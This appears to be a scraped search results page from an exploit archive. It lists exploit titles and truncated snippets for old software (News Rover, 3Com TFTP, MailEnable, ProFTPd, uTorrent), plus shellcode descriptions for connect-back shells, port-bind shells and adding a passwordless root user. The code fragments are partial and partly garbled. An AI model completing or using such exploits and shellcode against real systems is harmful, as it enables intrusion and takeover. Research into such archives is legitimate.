7258 matches found
PHP 4 - Userland ZVAL Reference Counter Overflow (PoC)
Refcount drops down to 0 // = String gets f...
News Rover 12.1 Rev 1 Remote Stack Overflow Exploit (perl)
No description provided by source. !/usr/bin/perl =============================================================================================== News Rover 12.1 Rev 1 Remote Stack Overflow perl exploit By Umesh Wanve [email protected]...
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode (Perl)
3Com TFTP Service 3CTftpSvc 2.0.1 - Long Transporting Mode Perl !/usr/bin/perl -w =============================================================================================== 3Com TFTP Service \n\n"; exit; $target = IO::Socket::INET-newProto='udp', PeerAddr=$ARGV0, PeerPort=$A...
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
!/usr/bin/perl -w =============================================================================================== 3Com TFTP Service \n\n"; exit; $target = IO::Socket::INET-newProto='udp', PeerAddr=$ARGV0, PeerPort=$ARGV1...
News Rover 12.1 Rev 1 - Stack Overflow (2)
!/usr/bin/perl =============================================================================================== News Rover 12.1 Rev 1 Remote Stack Overflow perl exploit By Umesh Wanve [email protected] ==============================================================================================...
News Rover 12.1 Rev 1 Remote Stack Overflow Exploit (perl)
Exploit for unknown platform in category local exploits ========================================================== News Rover 12.1 Rev 1 Remote Stack Overflow Exploit perl ========================================================== !/usr/bin/perl...
News Rover 12.1 Rev 1 - Stack Overflow (2)
News Rover 12.1 Rev 1 - Stack Overflow 2 !/usr/bin/perl =============================================================================================== News Rover 12.1 Rev 1 Remote Stack Overflow perl exploit By Umesh Wanve [email protected]...
MailEnable Professional 2.35 Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl maildisable-v6.pl Mail Enable Professional =v2.35 win32 remote exploit by mu-b - Tue Dec 5 2006 - Tested on: Mail Enable Professional v2.35 win32 Note: timing is quite critical with this!!, so change $senddelay if it doesn't work...
ProFTPd 1.3.01.3.0a - mod_ctrls support Local Buffer Overflow (2)
ProFTPd 1.3.01.3.0a - modctrls support Local Buffer Overflow 2 !/usr/bin/perl -w $Id: revengeproftpdctrls26.pl, v1.1 2007/02/18 19:30:25 revenge Exp $ ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit Original Advisory : http://www.coresecurity.com/?action=item&id=1594 Exploitation condition...
MS07-0 0 4 General overflow of the method-completion-bug warning-the black bar safety net
This article ms07-0 0 4 as an example, explores this vulnerability of the General method, to restore the ie method, as well as the heap spray technology. The topic is! by axis Date: 2007-02-13 Email: axisatph4nt0m.org MS07-0 0 4 out there for some time, I wrote an analysis paper, and for this...
uTorrent 1.6 Remote Heap Overflow Exploit PoC
No description provided by source. / This is a PoC remote exploit for uTorrent 1.6 Author: defsec [email protected] http://www.defacedsecurity.com Works on XP SP1 and w2k sp1-4 / include stdio.h include stdlib.h define NASIZE 4880 unsigned char niceannounceNASIZE;...
ipb search.php vulnerability analysis and thinking-vulnerability warning-the black bar safety net
ipb search.php vulnerability analysis and thinking A vulnerability model may unearth a batch of vulnerabilities Idea is the most important pregreplace+/e Author: SuperHeiAtph4nt0m.org Blog: http://superhei.blogbus.com/ Team: http://www.ph4nt0m.org Data: 2006-04-27 Simple analysis The vulnerabilit...
μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow
/ This is a PoC remote exploit for uTorrent 1.6 Author: defsec http://www.defacedsecurity.com Works on XP SP1 and w2k sp1-4 / include include define NASIZE 4880 unsigned char niceannounceNASIZE; unsigned char xorops="\x33\xc0\x33\xdb"; // win32exec - EXITFUNC=process CMD=calc Size=343...
solaris/sparc connect-back (with XNOR encoded session) 600 bytes
No description provided by source. / black-RXenc-con-back-SOLARIS.c MIPS This is a relitivly small 600 byte shellcode that encodes all network trafic between the exploited process and the attacker. All clear-text shell i/o is encoded using a simple NOT algo before being transmitted on the wire...
linux/x86 add root user r00t with no password to /etc/passwd 69 bytes
No description provided by source. / By Kris Katterjohn 11/14/2006 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd for Linux/x86 section .text global start start: ; open"/etc//passwd", OWRONLY | OAPPEND push byte 5 pop eax xor ecx, ecx push ecx push 0x64777373 push...
freebsd/x86 portbind 4883 with auth shellcode
No description provided by source. / THE ZUGCODE - SMALL REMOTE 6ACKD0R FreeBSD i386 bind shell with auth code by MahDelin Big thx SST kaka, nolife, white Listen on the port 4883 the /bin/sh / / void zugcodevoid //socket asm"xorl %eax, %eax"; asm"pushl %eax"; asm"pushl %eax"; asm"pushl $0x01";...
linux/x86 SET_IP() Connectback Shellcode 82 bytes
No description provided by source. /--------------------------------------------------------------------------- 82 byte Connectback shellcode by Benjamin Orozco - [email protected] --------------------------------------------------------------------------- filename: x86-linux-connectback.c...
bsd/x86 setuid/execve shellcode 30 bytes
No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. ...
linux/x86 SET_PORT() portbind 100 bytes
No description provided by source. /--------------------------------------------------------------------------- 100 byte Portbind shellcode by Benjamin Orozco - [email protected] --------------------------------------------------------------------------- filename: x86-linux-portbind.c discription...
bsd/x86 setuid/portbind shellcode 94 bytes
No description provided by source. / $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ portbind-bsd.c - setuid/portbind shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Simple portbind shellcode that bind's a setuid0 shell on...